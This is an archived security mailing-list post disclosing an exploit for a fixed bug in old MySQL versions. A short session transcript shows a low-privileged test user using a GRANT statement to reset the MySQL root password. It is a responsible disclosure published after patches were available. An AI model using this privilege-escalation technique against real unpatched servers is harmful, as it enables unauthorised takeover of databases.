Hi. As I posted to bugtraq a few weeks ago, I discovered a serious bug in MySQL:s password handling, affecting versions 3.22.29 and earlier, and 3.23.8 and earlier. As promised in that post, I now post an exploit, since all serious admins should have upgraded by now, especially with the password-checking bug found recently by Robert van der Meulen. Note that the bug which the code in this post exploits is fixed in 3.22.30 and later, as well as 3.23.10 and later. No current MySQL is vulnerable to this exploit. The old problem was simply that any user could alter any password in the system using the GRANT statement. Exploit: Connect to mysql as any user with grant privileges for any table. The default test users will do nicely. If no databases has been created for the test user, do so. Then alter roots (MySQL's roots, not the real roots!) password with a GRANT. After the code below has been executed, the password of the MySQL superuser 'root' will be 'newpassword'. > mysql -utest -p Password: mysql> CREATE DATABASE test_expl; Query OK, 1 row affected (0.04 sec) mysql> GRANT select ON test_expl.* TO root@localhost IDENTIFIED BY 'newpassword'; Query OK, 0 rows affected (0.01 sec) mysql> exit Bye The problem was quickly fixed, and I got good response from the people at TCX Datakonsult AB (thanks Monty!). I warmly recommend MySQL to anyone. This message is not CC:ed to the mysql-list, as an exploit has already been posted there. /Viktor... --| Viktor Fougstedt, system administrator at dtek.chalmers.se |-- --| http://www.dtek.chalmers.se/~viktor/ |-- --| ...soon we'll be sliding down the razor blade of life. /Tom Lehrer |--
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:34:40 PDT